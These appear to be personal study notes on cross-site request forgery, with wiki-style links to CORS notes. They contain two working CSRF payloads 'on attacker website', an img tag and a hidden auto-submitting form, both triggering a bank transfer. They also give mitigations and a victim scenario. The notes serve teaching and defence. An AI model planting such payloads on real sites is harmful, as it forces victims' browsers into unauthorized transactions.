Logs out the victim and logs into the attackers account
Try
to confirm the token has been properly implemented
[[CORS#Vulns]]
valid
<!-- on attacker website -->
<img src="https://www.bank.com/transfer?from=bob&to=joe&amount=500">
Many common web frameworks used to build websites, such as Ruby on Rails, Django, and so on, will expect developers to use POST to change data, and so they’ll automatically add CSRF protections to POST requests but not GET requests
valid
<!-- on attacker website -->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://bank.com/transfer' target="csrf-frame" id="csrf-form">
<input type='hidden' name='from' value='Bob'>
<input type='hidden' name='to' value='Joe'>
<input type='hidden' name='amount' value='500'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
The <iframe>
is used to hide the response from the victim. Can be left out for a PoC.
See [[CORS]]
Never use GET to perform any backend data-modifying requests (eg. transfer money, post article, like image, etc...)
Check value of Origin and Referer headers
After finishing his banking, Bob doesn’t log out when he leaves the banking website.
When Bob checks his email and clicks the link to visit the unknown site, he is inadvertently visiting a malicious website. That website is designed to perform a CSRF attack by instructing Bob’s browser to make a request to his banking website. This request will also send cookies from his browser.